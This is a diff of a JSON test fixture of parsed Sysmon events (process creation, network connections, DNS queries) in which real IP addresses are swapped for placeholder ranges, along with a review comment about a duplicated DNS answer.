@@ -7503,7 +7419,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741594200Z", + "ingested": "2021-12-09T13:50:23.456972Z", "code": "1", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e1\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e1\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:39.012744700Z'/\u003e\u003cEventRecordID\u003e7\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:39.012\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ce03-5c8f-0000-0010e9462a00}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4508\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\wbem\\WmiPrvSE.exe\u003c/Data\u003e\u003cData Name='FileVersion'\u003e6.3.9600.16384 (winblue_rtm.130821-1623)\u003c/Data\u003e\u003cData Name='Description'\u003eWMI Provider Host\u003c/Data\u003e\u003cData Name='Product'\u003eMicrosoft« Windows« Operating System\u003c/Data\u003e\u003cData Name='Company'\u003eMicrosoft Corporation\u003c/Data\u003e\u003cData Name='CommandLine'\u003eC:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding\u003c/Data\u003e\u003cData Name='CurrentDirectory'\u003eC:\\Windows\\system32\\\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData 
Name='LogonGuid'\u003e{42f11c3b-6e1a-5c8c-0000-0020e7030000}\u003c/Data\u003e\u003cData Name='LogonId'\u003e0x3e7\u003c/Data\u003e\u003cData Name='TerminalSessionId'\u003e0\u003c/Data\u003e\u003cData Name='IntegrityLevel'\u003eSystem\u003c/Data\u003e\u003cData Name='Hashes'\u003eSHA1=5A4C0E82FF95C9FB762D46A696EF9F1B68001C21\u003c/Data\u003e\u003cData Name='ParentProcessGuid'\u003e{42f11c3b-6e1b-5c8c-0000-00102f610000}\u003c/Data\u003e\u003cData Name='ParentProcessId'\u003e560\u003c/Data\u003e\u003cData Name='ParentImage'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='ParentCommandLine'\u003eC:\\Windows\\system32\\svchost.exe -k DcomLaunch\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -7553,15 +7469,15 @@ }, "destination": { "port": 53, - "ip": "a00:203:3000:3000:3000:3000:3000:3300" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "source": { "port": 62141, - "ip": "a00:20f:0:0:18a2:6e00:e0:ffff" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "network": { "protocol": "domain", - "community_id": "1:EQDBfI6vAylArTBQHY8kNmaweOA=", + "community_id": "1:o5sHG56d/GR7mu8ASz0uSsv7uF0=", "transport": "udp", "type": "ipv6", "direction": "egress" 
@@ -7575,14 +7491,13 @@ "NETWORK SERVICE" ], "ip": [ - "a00:20f:0:0:18a2:6e00:e0:ffff", - "a00:203:3000:3000:3000:3000:3000:3300" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741602800Z", + "ingested": "2021-12-09T13:50:23.456977900Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.089723100Z'/\u003e\u003cEventRecordID\u003e8\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:47.847\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003ea00:20f:0:0:18a2:6e00:e0:ffff\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e62141\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData 
Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003ea00:203:3000:3000:3000:3000:3000:3300\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e53\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003edomain\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.089723100Z'/\u003e\u003cEventRecordID\u003e8\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:47.847\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData 
Name='SourcePort'\u003e62141\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e53\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003edomain\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:49.089Z", 
@@ -7660,7 +7575,7 @@ ] }, "event": { - "ingested": "2021-06-14T13:23:14.741607200Z", + "ingested": "2021-12-09T13:50:23.456983600Z", "code": "3", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.089723100Z'/\u003e\u003cEventRecordID\u003e9\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e62141\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e10.0.2.3\u003c/Data\u003e\u003cData 
Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e53\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003edomain\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -7712,7 +7627,7 @@ }, "destination": { "port": 443, - "ip": "40.77.226.250" + "ip": "89.160.20.156" }, "source": { "port": 1138, @@ -7721,7 +7636,7 @@ }, "network": { "protocol": "https", - "community_id": "1:W2ZbP8nXMY+YAGYw2h/3Sa8Gu/w=", + "community_id": "1:BPIgbA//CuXUCUo7V4pQn4uLQOk=", "transport": "tcp", "type": "ipv4", "direction": "egress" 
@@ -7736,13 +7651,13 @@ ], "ip": [ "10.0.2.15", - "40.77.226.250" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741611600Z", + "ingested": "2021-12-09T13:50:23.456989400Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e10\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.148\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Protocol'\u003etcp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e1138\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData 
Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e40.77.226.250\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e443\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ehttps\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e10\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.148\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Protocol'\u003etcp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData 
Name='SourcePort'\u003e1138\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e443\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ehttps\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:49.340Z", @@ -7792,7 +7707,7 @@ }, "destination": { "port": 443, - "ip": "40.77.226.250" + "ip": "89.160.20.156" }, "source": { "port": 1139, @@ -7801,7 +7716,7 @@ }, "network": { "protocol": "https", - "community_id": "1:5MsyqYltV9KkhIFGPWiByzQqHDo=", + "community_id": "1:FaLCJ8g6qTBdQh1Rvg2/ru25R6M=", "transport": "tcp", "type": "ipv4", "direction": "egress" 
@@ -7816,13 +7731,13 @@ ], "ip": [ "10.0.2.15", - "40.77.226.250" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741615400Z", + "ingested": "2021-12-09T13:50:23.456995600Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e11\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.214\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Protocol'\u003etcp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e1139\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData 
Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e40.77.226.250\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e443\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ehttps\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e11\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.214\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Protocol'\u003etcp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData 
Name='SourcePort'\u003e1139\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e443\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ehttps\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:49.340Z", @@ -7892,17 +7807,17 @@ "type": "CNAME" }, { - "data": "23.50.53.179", + "data": "89.160.20.156", "type": "A" }, { - "data": "23.50.53.177", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.50.53.179", - "23.50.53.177" + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
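Review bot: Both A records for `ocsp.int-x3.letsencrypt.org` in the `@@ -7892` hunk were mapped to `89.160.20.156`, so `resolved_ip` now holds the same address twice and `related.ip` in the following hunk (`@@ -7919`) shrinks from two entries to one; the fixture no longer checks that several distinct answers are carried through to `resolved_ip` and `related.ip`, which is what the two original values covered. Mapping the second answer to a different address from the supported range — in the `QueryResults` text of `event.original` too, so the parsed fields and the raw event agree — keeps the duplicate out of `resolved_ip` and restores the two-entry `related.ip`.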
@@ -7919,14 +7834,13 @@ "ocsp.int-x3.letsencrypt.org" ], "ip": [ - "23.50.53.179", - "23.50.53.177" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741621300Z", + "ingested": "2021-12-09T13:50:23.457001500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802753800Z'/\u003e\u003cEventRecordID\u003e124\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.468\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.int-x3.letsencrypt.org\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.int-x3.letsencrypt.org.edgesuite.net;type: 5 a771.dscq.akamai.net;::ffff:23.50.53.179;::ffff:23.50.53.177;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802753800Z'/\u003e\u003cEventRecordID\u003e124\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.468\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.int-x3.letsencrypt.org\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.int-x3.letsencrypt.org.edgesuite.net;type: 5 a771.dscq.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -7990,11 +7904,11 @@ "type": "CNAME" }, { - "data": "172.217.12.195", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -8002,7 +7916,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -8010,7 +7924,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { 
@@ -8018,7 +7932,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.31.80.30",
+ "data": "192.168.80.30",
 "type": "A"
 },
 {
@@ -8026,21 +7940,21 @@
 "type": "AAAA"
 },
 {
- "data": "192.12.94.30",
+ "data": "192.168.94.30",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "172.217.12.195",
- "192.5.6.30",
+ "89.160.20.156",
+ "192.168.6.30",
 "2001:503:a83e::2:30",
- "192.33.14.30",
+ "192.168.14.30",
 "2001:503:231d::2:30",
- "192.26.92.30",
+ "192.168.92.30",
 "2001:503:83eb::30",
- "192.31.80.30",
+ "192.168.80.30",
 "2001:500:856e::30",
- "192.12.94.30"
+ "192.168.94.30"
 ]
 },
 "network": {
@@ -8056,22 +7970,22 @@ "ocsp.pki.goog" ], "ip": [ - "172.217.12.195", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741630200Z", + "ingested": "2021-12-09T13:50:23.457007200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 